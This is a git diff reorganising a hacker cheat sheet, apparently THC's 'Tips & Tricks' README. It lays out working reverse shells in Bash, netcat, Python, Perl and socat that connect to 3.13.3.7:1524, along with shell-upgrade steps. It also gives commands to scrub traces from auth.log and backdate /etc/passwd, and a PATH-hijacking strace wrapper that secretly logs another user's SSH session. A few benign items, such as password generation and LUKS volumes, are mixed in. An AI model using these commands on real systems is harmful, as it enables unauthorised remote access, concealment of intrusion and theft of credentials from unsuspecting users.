diff --git a/README.md b/README.md
index a56132c..f139f73 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-# THC's Tips & Tricks (Cheat Sheet)
+# THC's favourite Tips, Tricks & Hacks (Cheat Sheet)
A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.
@@ -24,6 +24,29 @@ Got tricks? Send them to root@thc.org or submit a pull request.
1. [xxd](#fex-anchor)
1. [File transfer using screen from REMOTE to LOCAL](#ftsrl-anchor)
1. [File transfer using screen from LOCAL to REMOTE](#ftslr-anchor)
+5. [Reverse Shell / Dumb Shell](#rs-anchor)
+ 1. [Reverse Shells](#rs-anchor)
+ 1. [with Bash](#rswb-anchor)
+ 1. [without Bash](#rswob-anchor)
+ 1. [with Python](#rswpy-anchor)
+ 1. [with Perl](#rswpl-anchor)
+ 1. [Upgrading the dumb shell](#rsu-anchor)
+ 1. [Upgrade a reverse shell to a pty shell](#rsup-anchor)
+ 1. [Upgrade a reverse shell to a fully interactive shell](#rsup2-anchor)
+ 1. [Reverse shell with socat (fully interactive)](#rssc-anchor)
+ 6. [Shell Hacks](#sh-anchor)
+ 1. [Shred files (secure delete)](#shsf-anchor)
+ 1. [Shred files without *shred*](#shsfwo-anchor)
+ 1. [Restore the date of a file](#shrdf-anchor)
+ 1. [Clean logfile](#shcl-anchor)
+ 1. [Hide files from a User without root priviledges](#shhu-anchor)
+ 7. [Crypto](#cr-anchor)
+ 1. [Generate quick random Password](#crgrp-anchor)
+ 1. [Linux transportable encrypted filesystems](#crltefs-anchor)
+ 8. [Miscellaneous](#misc-anchor)
+ 1. [Sniff a user's SSH session](#sss-anchor)
+ 1. [Sniff a user's SSH session without root priviledges](#ssswor-anchor)
+
---
@@ -107,54 +130,12 @@ $ nmap -thc
**3.iii. Alert on new TCP connections**
-Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from our system (could be an admin!).
+Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from the target system (could be an admin!).
```
# tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done
```
-**8. Sniff a SSH session**
-```
-$ strace -p -e trace=read -o ~/.ssh/ssh_log.txt
-$ grep 'read(4' ~/.ssh/ssh_log.txt | cut -f1 -d\"
-```
-Dirty way to monitor a user who is using ssh to connect to another host from a computer that you control.
-
-**9. Sniff a SSH session without root priviledges**
-
-Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH clients unless uid=0)
-
-Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
-```
-# Add ~/.ssh to the execution PATH variable so our 'ssh' is executed instead of the real ssh:
-$ echo '$PATH=~/.local/bin:$PATH' >>~/.profile
-
-# Create our log directory and our own ssh binary
-$ mkdir ~/.ssh/.logs
-$ mkdir -p ~/.local/bin ~/.ssh/logs
-
-$ cat >~/.local/bin/ssh
-#! /bin/bash
-strace -e trace=read -o '! ~/.local/bin/ssh-log $$' /usr/bin/ssh $@
-# now press CTRL-d to close the file.
-
-$ cat ~/.local/bin/ssh-log
-#! /bin/bash
-grep 'read(4' | cut -f2 -d\" | while read -r x; do
- if [ ${#x} -ne 2 ] && [ ${#x} -ne 1 ]; then continue; fi
- if [ x"${x}" == "x\\n" ] || [ x"${x}" == "x\\r" ]; then
- echo ""
- else
- echo -n "${x}"
- fi
-done >~/.ssh/.logs/ssh-log-"${1}"-`date +%s`.txt
-# now press CTRL-d to close the file
-
-$ chmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log
-```
-
-The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH.
-
---
@@ -264,88 +245,10 @@ Get *screen* to slurp the base64 encoded data into screen's clipboard and paste
Note: Two C-d are required due to a [bug in openssl](https://github.com/openssl/openssl/issues/9355).
-**14. Shred & Erase a file**
-
-```
-$ shred -z foobar.txt
-```
-
-**15. Shred & Erase without *shred***
-```
-$ FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}"
-```
-Note: Or deploy your files in */dev/shm* directory so that no data is written to the harddrive. Data will be deleted on reboot.
-
-Note: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file.
-
-**16. Hide files as User from that User**
-
-```
-alias ls='ls -I SecretDirectory'
-```
-
-This will hide the directory *SecretDirectory* from the *ls* command. Place in user's *~/.profile*.
-
-**17. Restore the date of a file**
-
-Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
-
-```
-$ touch -r /etc/shadow /etc/passwd
-```
-
-
-**20. Generate quick random Password**
-
-Good for quick passwords without human element.
-
-```
-$ openssl rand -base64 24
-```
-
-**21. Get a root shell in Docker container.**
-
-If the container is already running:
-
-```
-$ docker exec -it --user root /bin/bash
-```
-
-If the container is not running:
-
-```
-$ docker run -it --user root --entrypoint /bin/bash
-```
-
-**22. Linux transportable encrypted filesystems.**
-
-Like truecrypt but better. You may need to `losetup -f` to get a loop device.
-
-Make a junk file, here 256MB is used, encrypt, and partition. You will be prompted for a password.
-
-```
-$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock
-$ cryptsetup luksFormat /tmp/crypted
-$ mkfs.ext3 /tmp/crypted
-```
-
-Mount:
-
-```
-# losetup /dev/loop0 /tmp/crypted
-# cryptsetup open /dev/loop0 crypted
-# mount -t ext3 /dev/mapper/crypted /mnt/crypted
-```
-
-Store data in `/mnt/crypted`, then unmount:
-
-```
-# umount /mnt/crypted
-# cryptsetup close crypted
-# losetup -d /dev/loop0
-```
-
-**23. Reverse shell with Bash**
+---
+
+
+**5.i.a. Reverse shell with Bash**
Start netcat to listen on port 1524 on your system:
```
@@ -354,10 +257,11 @@ $ nc -nvlp 1524
On the remote system. This Bash will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:
```
-$ bash -i 2>&1 >& /dev/tcp/3.13.3.7/1524 0>&1
+$ bash -i 2>&1 >&/dev/tcp/3.13.3.7/1524 0>&1
```
-**24. Reverse shell without Bash**
+
+**5.i.b. Reverse shell without Bash**
Especially embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet:
@@ -373,12 +277,14 @@ $ mkfifo /tmp/.io
$ sh -i 2>&1 /tmp/.io
```
-**24. Reverse shell with Python**
+
+**5.i.c. Reverse shell with Python**
```
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
-**25. Reverse shell with Perl**
+
+**5.i.d. Reverse shell with Perl**
```
# method 1
@@ -387,7 +293,9 @@ $ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprot
$ perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
```
-**26. Upgrade a reverse shell to a pty shell**
+
+
+**5.ii.a. Upgrade a reverse shell to a PTY shell**
Any of the above reverse shells are limited. For example *sudo bash* or *top* will not work. To make these work we have to upgrate the shell to a real PTY shell:
@@ -402,7 +310,8 @@ perl -e 'exec "/bin/bash";'
awk 'BEGIN {system("/bin/bash")}'
```
-**27. Upgrade a reverse shell to a fully interactive shell**
+
+**5.ii.b. Upgrade a reverse shell to a fully interactive shell**
...and if we also like to use Ctrl-C we have to go all the way and upgrade the reverse shell to a real fully colorfull interactive shell:
@@ -424,7 +333,8 @@ $ export TERM=xterm-256color
$ stty rows 24 columns 80
```
-**28. Reverse shell with socat (fully interactive)**
+
+**5.ii.c. Reverse shell with socat (fully interactive)**
...or install socat and get it done without much fiddling about:
@@ -435,5 +345,140 @@ socat file:`tty`,raw,echo=0 tcp-listen:1524
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524
```
+---
+
+
+**6.i. Shred & Erase a file**
+
+```
+$ shred -z foobar.txt
+```
+
+
+**6.ii. Shred & Erase without *shred***
+```
+$ FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}"
+```
+Note: Or deploy your files in */dev/shm* directory so that no data is written to the harddrive. Data will be deleted on reboot.
+
+Note: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file.
+
+
+**6.iii. Restore the date of a file**
+
+Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
+
+```
+$ touch -r /etc/shadow /etc/passwd
+```
+
+
+**6.iv. Clear logfile**
+
+This will reset the logfile to 0 without having to restart syslogd etc:
+```
+# cat /dev/null >/var/log/auth.log
+```
+
+This will remove any sign of us from the log file:
+```
+# grep -v 'thc\.org' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log
+```
+
+
+**6.v. Hide files from that User withour root priviledges**
+
+```
+alias ls='ls -I SecretDirectory'
+```
+
+This will hide the directory *SecretDirectory* from the *ls* command. Place in user's *~/.profile*.
+
+
+
+**7.i. Generate quick random Password**
+
+Good for quick passwords without human element.
+
+```
+$ openssl rand -base64 24
+```
+
+
+**7.ii. Linux transportable encrypted filesystems**
+
+Create a 256MB large encrypted file system. You will be prompted for a password.
+
+```
+$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock
+$ cryptsetup luksFormat /tmp/crypted
+$ mkfs.ext3 /tmp/crypted
+```
+
+Mount:
+
+```
+# losetup -f
+# losetup /dev/loop0 /tmp/crypted
+# cryptsetup open /dev/loop0 crypted
+# mount -t ext3 /dev/mapper/crypted /mnt/crypted
+```
+
+Store data in `/mnt/crypted`, then unmount:
+
+```
+# umount /mnt/crypted
+# cryptsetup close crypted
+# losetup -d /dev/loop0
+```
+
+---
+
+
+**8.i. Sniff a user's SSH session**
+```
+$ strace -p -e trace=read -o ~/.ssh/ssh_log.txt
+$ grep 'read(4' ~/.ssh/ssh_log.txt | cut -f1 -d\"
+```
+Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control.
+
+
+**8.ii. Sniff a user's SSH session without root priviledges**
+
+Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH clients unless uid=0)
+
+Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
+```
+# Add ~/.ssh to the execution PATH variable so our 'ssh' is executed instead of the real ssh:
+$ echo '$PATH=~/.local/bin:$PATH' >>~/.profile
+
+# Create our log directory and our own ssh binary
+$ mkdir ~/.ssh/.logs
+$ mkdir -p ~/.local/bin ~/.ssh/logs
+
+$ cat >~/.local/bin/ssh
+#! /bin/bash
+strace -e trace=read -o '! ~/.local/bin/ssh-log $$' /usr/bin/ssh $@
+# now press CTRL-d to close the file.
+
+$ cat ~/.local/bin/ssh-log
+#! /bin/bash
+grep 'read(4' | cut -f2 -d\" | while read -r x; do
+ if [ ${#x} -ne 2 ] && [ ${#x} -ne 1 ]; then continue; fi
+ if [ x"${x}" == "x\\n" ] || [ x"${x}" == "x\\r" ]; then
+ echo ""
+ else
+ echo -n "${x}"
+ fi
+done >~/.ssh/.logs/ssh-log-"${1}"-`date +%s`.txt
+# now press CTRL-d to close the file
+
+$ chmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log
+```
+
+The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH.
+
+
+
---
Shoutz: ADM